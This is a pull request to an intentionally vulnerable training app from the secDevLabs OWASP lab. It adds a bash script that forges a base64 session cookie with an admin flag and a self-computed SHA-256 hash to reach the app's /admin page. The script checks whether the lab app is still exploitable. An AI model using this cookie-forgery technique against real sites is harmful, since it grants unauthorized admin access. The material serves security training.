### PR TITLE
Add script to verify if Saidajaula Monster is still exploitable

### DIFF
--- a/owasp-top10-2017-apps/a2/saidajaula-monster/Makefile
+++ b/owasp-top10-2017-apps/a2/saidajaula-monster/Makefile
@@ -24,6 +24,11 @@ msg:
 	chmod +x deployments/check-init.sh
 	./deployments/check-init.sh
 
+## Tries to exploit the app with commands shown in the attack narrative.
+exploit:
+	chmod +x deployments/exploit.sh
+	./deployments/exploit.sh
+
 ## Prints help message
 help:
 	printf "\n${COLOR_YELLOW}${PROJECT}\n------\n${COLOR_RESET}"

--- a/owasp-top10-2017-apps/a2/saidajaula-monster/deployments/exploit.sh
+++ b/owasp-top10-2017-apps/a2/saidajaula-monster/deployments/exploit.sh
@@ -51,6 +51,7 @@ if registerAttemptSuccessfull && loginAttemptSuccessfull; then
     if adminIsAccessible; then
         echo "Response:"
         echo -e "${RED}The app is still exploitable${RESET}"
+        exit 1
     else
         echo "Response:"
         echo -e "${GREEN}The app is no longer exploitable!${RESET}"

--- a/owasp-top10-2017-apps/a2/saidajaula-monster/deployments/exploit.sh
+++ b/owasp-top10-2017-apps/a2/saidajaula-monster/deployments/exploit.sh
@@ -44,10 +44,15 @@ adminIsAccessible() {
     return 1
 }
 
+echo "secDevLabs: Exploiting your app locally!"
+printf "Log in as admin by modifying session cookie.\n\n"
+
 if registerAttemptSuccessfull && loginAttemptSuccessfull; then
     if adminIsAccessible; then
+        echo "Response:"
         echo -e "${RED}The app is still exploitable${RESET}"
     else
+        echo "Response:"
         echo -e "${GREEN}The app is no longer exploitable!${RESET}"
     fi
     exit 0

--- a/owasp-top10-2017-apps/a2/saidajaula-monster/deployments/exploit.sh
+++ b/owasp-top10-2017-apps/a2/saidajaula-monster/deployments/exploit.sh
@@ -1,0 +1,58 @@
+#!/bin/bash
+#
+# This script tries to exploit the intentionally vulnerable A2-SaiDaJaula-Monster the same way as shown in the attack narrative.
+#
+
+RESET='\033[0m'
+GREEN='\033[32m'
+RED='\033[31m'
+
+username="user$RANDOM"
+password="pass"
+appPort=10002
+
+registerAttemptSuccessfull() {
+    registerMessage=$(curl --silent localhost:$appPort/register -F "username=$username" -F "password=$password" -F "password2=$password" -X POST)
+    
+    if [[ $registerMessage =~ "Error" ]]; then
+        return 1
+    fi
+
+    return 0
+}
+
+loginAttemptSuccessfull() {
+    logginMessage=$(curl --silent localhost:$appPort/login -F "username=$username" -F "password=$password" -X POST)
+
+    if [[ $logginMessage =~ "Logged" ]]; then
+        return 0
+    fi
+
+    return 1
+}
+
+adminIsAccessible() {
+    cookieHashPart=($(echo -n {\"permissao\": 1, \"username\": \"$username\"} | shasum -a 256))
+    base64Cookie=$(echo -n {\"permissao\": 1, \"username\": \"$username\"}.$cookieHashPart | base64)
+    
+    adminResponse=$(curl --silent --cookie "sessionId=$base64Cookie" http://localhost:$appPort/admin)
+
+    if [[ $adminResponse =~ "You are an admin!" ]]; then
+        return 0
+    fi
+
+    return 1
+}
+
+if registerAttemptSuccessfull && loginAttemptSuccessfull; then
+    if adminIsAccessible; then
+        echo -e "${RED}The app is still exploitable${RESET}"
+    else
+        echo -e "${GREEN}The app is no longer exploitable!${RESET}"
+    fi
+    exit 0
+fi
+
+printf "The script wasn't able to register a new user or to login.\nDid you change the app's port or modify the routes?\n"
+
+exit 1


### PR DESCRIPTION
The goal of this PR is to add an easy way to verify if the app can still be exploited by the commands shown in it's [attack narrative](https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a2/saidajaula-monster#attack-narrative).

### Changes:
* `owasp-top10-2017-apps/a2/saidajaula-monster/Makefile`: Add `make exploit` command to call the exploit script.
* `owasp-top10-2017-apps/a2/saidajaula-monster/deployments/exploit.sh`: Adds commands to try and exploit the app the same way as shown in the attack narrative.

### How It Works:

With the app running, simply run the `make exploit` command:

![image](https://user-images.githubusercontent.com/40367872/75629912-08a5f400-5bc5-11ea-866e-b039e631a0b7.png)

If the app is no longer exploitable through the commands shown in the attack narrative:

![image](https://user-images.githubusercontent.com/40367872/75629965-8bc74a00-5bc5-11ea-8eb9-9176210537c5.png)


